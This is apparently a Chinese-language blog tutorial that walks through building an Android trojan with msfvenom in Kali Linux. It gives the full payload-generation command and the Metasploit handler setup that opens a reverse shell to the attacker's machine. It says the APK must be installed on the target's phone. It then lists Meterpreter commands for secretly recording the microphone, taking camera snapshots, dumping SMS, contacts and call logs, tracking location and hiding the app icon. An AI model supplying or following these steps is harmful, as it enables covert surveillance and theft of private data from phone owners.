一、绪论

安装 kail linux 在此不做详细的讲解，可自行百度安装，都是傻瓜式安装（注意如果是在虚拟机上安装，网络配置一定要使用桥接模式，这样才能和主机上网，否则不能上网）

安装好的kail linux 界面如下：

二、步骤

1、生成木马

执行命令： msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

如果不知道你电脑ip，可以使用ifconfig命令查看ip

这时你会在root文件夹下看见一个名为apk.apk的安装包，这个就是我们入侵手机的木马了

2、启动msfconsole 使用msfconsole来启动msfconsole

执行命令：msfconsole

3、设置msfconsole

use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置

4、设置地址和端口

这里需要设置LHOST的ip地址，也就是你的kali的ip地址

还有LPORT端口，刚才设置的为5555
1.set LHOST 192.168.2.8 //这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

5、开始监听手机（必须吧你上面生成apk安装到目标手机上并且点一下）

监听命令：exploit //开始执行漏洞 开始监听,等待手机上线

这样就完成了，

下面是一些之后的命令操作

### ？是查看命令

webcam_list 列出网络摄像头

record_mic [?rek?rd]/记录/ 从默认麦克风录制音频为X秒

webcam_chat 开始视频聊天

webcam_snap 从指定的摄像头获取快照

webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]

Android Commands

activity_start 从URI字符串启动Android活动

check_root 检查设备是否有根

dump_calllog 获取调用日志

dump_contacts 获取联系人列表

dump_sms 获取短信

geolocate 利用地理定位获取当前LAT

wlan_geolocate 利用WLAN信息获取当前LAT

hide_app_icon 从发射器隐藏应用程序图标

interval_collect 管理区间收集能力

send_sms 从目标会话发送短消息

set_audio_mode

sqlite_query 从存储库查询SQLite数据库

wakelock 启用/禁用Wakelock